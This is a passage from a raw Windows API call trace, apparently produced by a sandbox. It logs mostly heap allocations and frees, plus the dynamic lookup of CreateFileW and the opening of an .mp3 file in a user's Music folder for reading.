dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0111.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0111.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0111.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0111.864] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0111.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0111.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0111.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0111.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0111.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0111.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0111.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0111.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0111.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0111.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0111.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0111.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0111.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0111.866] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0111.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0111.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0111.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0111.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0111.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.869] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0111.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0111.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca880, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0111.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.869] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0111.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0111.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0111.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0111.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0111.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0111.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0111.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0111.870] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\d4swwmt- hf4jge2.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0111.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0111.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0111.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0111.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0111.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0111.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.872] FreeLibrary (hLibModule=0x772d0000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 